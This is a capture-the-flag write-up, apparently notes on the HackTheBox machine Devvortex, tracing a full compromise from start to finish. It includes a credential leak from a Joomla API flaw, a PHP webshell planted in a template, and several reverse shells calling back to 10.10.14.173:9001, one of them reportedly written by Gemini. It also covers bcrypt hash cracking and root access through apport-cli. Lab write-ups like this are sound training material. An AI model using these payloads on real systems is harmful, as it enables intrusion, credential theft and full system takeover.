# Lessons Learned
- xxx
---
# After-Action Attack Sequence
- BLUF: xxx
- xxx
---
# Discover Ports & Services
- `ping` test ![[images/Pasted image 20260711145633.png]]
- `nmap` scan - light![[images/Pasted image 20260711145850.png]]
- `nmap` scan - detailed![[images/Pasted image 20260711145906.png]]
- `nmap` UDP scan ![[images/Pasted image 20260711150135.png]]
---
# Port 80 (HTTP): nginx ver. 1.18.0
## Initial enum
- visit page ![[images/Pasted image 20260711150256.png]]
- requst:response in burp![[images/Pasted image 20260711150303.png]]
- `robots.txt` > 404
- `sitemap.xml` > 404
- `index.html` > everything looks to be static html ![[images/Pasted image 20260711150615.png]]
- `index.php` > 404
- rando page > 404
- `whatweb` scan ![[images/Pasted image 20260711150743.png]]
- `nuclei` scan ![[images/Pasted image 20260711151057.png]]
## Fuzzing
- directory ![[images/Pasted image 20260711151408.png]]
- with extensions ![[images/Pasted image 20260711151708.png]]
- subdomain
- vhost ![[images/Pasted image 20260711152014.png]]
## `dev.devvortex.htb`
- visit page ![[images/Pasted image 20260711152320.png]]
- everything is static here, too
- run a Google image lookup on the favicon > `Bootstrap` logo
- headers
```bash
curl -I http://dev.devvortex.htb
```
![[images/Pasted image 20260711152527.png]]
- methods
```bash
curl -X OPTIONS -i http://dev.devvortex.htb
```
![[images/Pasted image 20260711152607.png]]
- `nuclei` scan ![[images/Pasted image 20260711153257.png]]
- uncovered an API endpoint that is susceptible to `CVE-2023-23752` ![[images/Pasted image 20260711153316.png]]
- visiting this API endpoint leaks creds for `Lewis` ![[images/Pasted image 20260711153520.png]]
- fuzzing
- directory ![[images/Pasted image 20260711162812.png]]
- `feroxbuster` > overload of output
```bash
feroxbuster -u http://dev.devvortex.htb
```
![[images/Pasted image 20260711154115.png]]
## `dev.devvortex.htb/administrator`
- visit page ![[images/Pasted image 20260711153738.png]]
- using the leaked creds we are into the Joomla dashboard
- Joomla ver. 4.2.6
- users ![[images/Pasted image 20260711154549.png]]
- edit `cassiopeia` template for `error.php` with a simple php webshell and save
```php
system($_GET['cmd']);
```
![[images/Pasted image 20260711154851.png]]
- try to hit `error.php`
```bash
curl -s http://dev.devvortex.htb/templates/cassiopeia/error.php?cmd=id
```
- didn't work and also didn't seem to save
- try `offline.php`
- now we have RCE ![[images/Pasted image 20260711155208.png]]
- `/etc/passwd` ![[images/Pasted image 20260711161127.png]]
- only `logan` and `root` have login shells
- only `logan` has a home dir ![[images/Pasted image 20260711161213.png]]
- throw this php revshell into `offline.php`
```php
php -r '$sock=fsockopen("10.10.14.173",9001);system("sh <&3 >&3 2>&3");'
```
![[images/Pasted image 20260711155346.png]]
- try switching out `system` for `exec`, `shell_exec`, `proc_open`, `passthru`, `popen` > none work
- try without the `php -r` ![[images/Pasted image 20260711164838.png]]
- we are getting a call back on listener but it immediately closes ![[images/Pasted image 20260711164843.png]]
- Gemini helped here with the below php revshell
```php
$sock = fsockopen("10.10.14.173", 9001);
$descriptorspec = array(
0 => $sock, // stdin is socket
1 => $sock, // stdout is socket
2 => $sock // stderr is socket
);
$process = proc_open('/bin/sh -i', $descriptorspec, $pipes);
proc_close($process);
```
---
# Shell as `www-data` > foothold
- We are now on the box ![[images/Pasted image 20260711165301.png]]
- check open ports ![[images/Pasted image 20260711165510.png]]
- try to access db
```bash
mysql -u lewis -p
```
- we are in the db ![[images/Pasted image 20260711193834.png]]
- we have `$2y
hashes for `lewis` and `logan` ![[images/Pasted image 20260711194157.png]]
- this is bcrypt
- crack with `hashcat`
```bash
hashcat -m 3200 logan.hash /opt/rockyou.txt
```
![[images/Pasted image 20260711194635.png]]
---
# Shell as `logan`
## Initial Enum
- we have a lead on `/usr/bin/apport-cli` ![[images/Pasted image 20260711194743.png]]
---
# Privesc
- Try the below
```bash
sudo /usr/bin/apport-cli
```
- No crash reports? ![[images/Pasted image 20260711194931.png]]
- logs in `/var/crash`
- let's create a crash report
```bash
sleep 100 &
kill -11 2831
```
- hmm we have a crash report in `/var/crash` but nothing happened ![[images/Pasted image 20260711195245.png]]
- Hmmmm
- Googling `sudo /usr/bin/apport-cli privesc` shows `CVE-2023-1326`
- See [GitHub - diego-tella/CVE-2023-1326-PoC: A proof of concept for CVE-2023–1326 in apport-cli 2.26.0 · GitHub](https://github.com/diego-tella/CVE-2023-1326-PoC)
```bash
sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash
#press V
: !/bin/bash
```
- Rooted! ![[images/Pasted image 20260711200001.png]]